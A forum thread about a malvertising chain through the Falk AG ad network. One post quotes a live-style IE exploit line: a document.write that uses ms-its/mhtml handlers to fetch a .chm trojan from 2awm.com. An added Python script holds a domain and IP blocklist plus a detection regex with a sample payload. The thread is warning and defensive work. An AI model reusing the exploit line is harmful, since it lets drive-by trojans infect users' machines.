  1. #1
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    Falk eSolutions AG - http://www.falkag.de/ - is a German advertising network that allows .ASP based ads. They're not very picky about their advertisers though, they seem to allow everything from scumware pushers to blue chip customers on.

    Here's a nasty little scumware trail.

    Comingsoon.net (don't go there unless you know what you're doing as it will infect your PC) is a popular movies site (Alexa rank 8643). It buys advertising from Falk AG - typically routing through falkag.net. There are several advertising banners/popups using Falk's services. I can see one from T-Mobile for example.

    One of these is a popup banner for an outfit called ntsearch.com based in Russia:

    Registrant:
    ZAO Gator
    p.o. box #84
    St-Petersburg, Spb 193241
    RU

    Domain name: NTSEARCH.COM

    Administrative Contact:
    Gator, ZAO gator_domains@yahoo.com
    p.o. box #84
    St-Petersburg, Spb 193241
    RU
    +7-812-325-08-16
    Technical Contact:
    Gator, ZAO gator_domains@yahoo.com
    p.o. box #84
    St-Petersburg, Spb 193241
    RU
    +7-812-930-63-38 Fax: +7-812-930-63-38



    Registrar of Record: TUCOWS, INC.
    Record last updated on 05-Jul-2004.
    Record expires on 18-Jul-2006.
    Record created on 18-Jul-2002.

    Domain servers in listed order:
    NS2.NTSEARCH.COM 64.246.33.205
    NS1.NTSEARCH.COM 64.246.32.114

    It's hosted by the spam-friendly US host Everyones Internet, Inc (EV1.NET).

    The redirector I get is http:// www.ntsearch.com /uk_in.php?acc=zon10 DO NOT VISIT THIS

    This bounced through 64.246.46.32 (EV1.NET) to http:// 2awm.com/ 309.php DO NOT VISIT THIS based in the Czech Republic:

    Registrant:
    Somjet, inc
    Adam Oker (info@adultn.com)
    Jungmannova 31
    Prague 1
    null,11000
    CZ
    Tel. +42.022449435

    This is hosted on 195.225.177.21 in the Ukraine.

    What we get on the 2awm.com server is a line containing:

    document.write(cxw.value.replace("${PR}","ms-its:mhtml:file://c:\\nosuch.mht!http://www.2awm.com /file/309.chm::/1.htm"))
    REALLY REALLY DON'T CLICK THIS

    This uses a well-known IE exploit to install some sort of crapware. In this case it looks like a variant of CoolWebSearch (CWS) (i.e. about the worst trojan you can get).

    We use CA eTrust which detects the trojan as HTML.MHTMLRedir.exploit - this is easy to protect against if you keep your patches up to date. http://support.microsoft.com/default...b;en-us;260897 has more information.

    At no point was the user asked permission to install this software. The originating site (Comingsoon.net) is only guilty of making a bad choice of advertising network. Apart from the obvious wrongdoing by the CWS pushers, it's clear that Falk AG is happy to take the money from the scumware merchants.

    Other suspect domains
    These are hosted on the Ukrainian server:
    2awm.com
    Awmgate.com
    Check-wire.com
    Lab-wire.com
    Online-more.com
    Find-by-web.com
    Search4www.com

    falkag.net seems to split traffic between US and European targeted servers:
    * as-us.falkag.net ~ 60%
    * as-eu.falkag.net ~ 40%

    If you're a network administrator, I'd suggest blocking access to all of falkag.net.

    If you're an advertiser, I'd suggest reconsidering your relationship, and if you're a publisher I would pull those ads right now before you get the blame for spreading spyware.
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.
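A defender-side check for the trail described in the post above, added here as an example and not part of the original thread: it matches proxy-log hosts against the domains and IPs the post names (by label suffix, so subdomains such as as-eu.falkag.net are caught) and flags page bodies that chain the ms-its:/mhtml: handlers. The log format, client addresses, URL paths and sample body are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Domains and IPs named in the post (falkag.net per its blocking suggestion).
BLOCKED_SUFFIXES = {
    "falkag.net", "ntsearch.com", "2awm.com", "awmgate.com", "check-wire.com",
    "lab-wire.com", "online-more.com", "find-by-web.com", "search4www.com",
}
BLOCKED_IPS = {"195.225.177.21", "64.246.46.32"}

# Pattern of the quoted exploit line: ms-its: chained to mhtml:, or an
# mhtml:file:// reference that pivots to a remote http(s) URL after "!".
HANDLER_RE = re.compile(r"ms-its:\s*mhtml:|mhtml:file://[^\"']*!https?://", re.I)

def host_is_blocked(host):
    """True if host is a listed IP, a listed domain, or any subdomain of one."""
    host = host.lower().rstrip(".")
    if host in BLOCKED_IPS:
        return True
    labels = host.split(".")
    # Compare whole label suffixes so "notfalkag.net" does not match "falkag.net".
    return any(".".join(labels[i:]) in BLOCKED_SUFFIXES for i in range(len(labels)))

def scan_proxy_log(lines):
    """Each line is '<client> <url>' (assumed format); returns (client, host) hits."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        host = urlsplit(parts[1]).hostname or ""
        if host_is_blocked(host):
            hits.append((parts[0], host))
    return hits

def body_has_handler_abuse(body):
    """True if a fetched page body references the chained protocol handlers."""
    return bool(HANDLER_RE.search(body))

# Constructed sample data, not taken from real logs.
SAMPLE_LOG = [
    "10.0.0.5 http://as-eu.falkag.net/ad.asp",
    "10.0.0.6 http://notfalkag.net/index.html",
    "10.0.0.7 http://WWW.2AWM.COM/page",
    "10.0.0.8 http://195.225.177.21/x",
    "10.0.0.9 https://example.org/",
]
SAMPLE_BODY = r'document.write(v.replace("${PR}","ms-its:mhtml:file://c:\\nosuch.mht!http://blocked.example/f.chm::/1.htm"))'
```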

  2. #2
    2005 Linkshare Golden Link Award Winner  ecomcity's Avatar
    Join Date
    January 18th, 2005
    Location
    St Clair Shores MI.
    Posts
    17,328
    Thanks Dynamoo as I forwarded this post to 3 cybercrime units for sniffing out the money trail and any cybercriminal activity. More and more of these 3rd world wanks are bundling actual computer virus trojan horse viruses to make un-installs troublesome. They also use the exploit hidden back door to download other BHOs for infestation fees.
    Webmaster's... Mike and Charlie

    "What have you done today to put real value into a referral click...from a shoppers viewpoint!"

  3. #3
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    Falk AG do it again!

    http://www.theregister.co.uk/2004/11...server_attack/

    I've already added them to my adware blocker. When I go back to my real-life work, they'll be blocked at the proxy there too.
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.

  4. #4
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    Uh-oh.. now it's been picked up on Slashdot:
    http://it.slashdot.org/article.pl?si...id=113&tid=172

    Remember folks, you read it here first!
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.

  5. #5
    ABW Ambassador
    Join Date
    January 18th, 2005
    Location
    ÄúsTrálíĺ
    Posts
    1,372
    Gorilla Nation uses Falk to serve their banners. I'm sure there are many other advertising companies using Falk also.
    Gorilla Nation is a large advertiser on movie/film/etc sites.

    Are you sure it's just not one particular advertiser using the Falk network? (Like 1 advertiser using fastclick etc)

  6. #6
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    Yes, the pattern seems to be that there's a single advertiser whose ads are being carried by Falk AG, and that advertiser is being served only to certain sites. Falk's servers are infected with anything as far as I can tell, but in the case I looked at above it did seem to be a deliberate attempt to spread a trojan by the advertiser.
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.

  7. #7
    ABW Adviser Panel Dynamoo's Avatar
    Join Date
    January 18th, 2005
    Location
    Opposite the Slough of Despond
    Posts
    5,465
    The Register has a statement here:

    http://www.theregister.co.uk/2004/11...fra_statement/

    Frankly this looks like BS from Falk AG.
    Innovative advertising with Slimeware Corporation and Telephore. Mail-order fuel with Petrol Direct.

  8. #8
    2005 Linkshare Golden Link Award Winner  ecomcity's Avatar
    Join Date
    January 18th, 2005
    Location
    St Clair Shores MI.
    Posts
    17,328
    Spooky world when the AdWhores hire computer worm and trojan horse virus writers to assist in stealth installs of Adware/spyware to earn commissions while stealing privacy info.
    Webmaster's... Mike and Charlie

    "What have you done today to put real value into a referral click...from a shoppers viewpoint!"
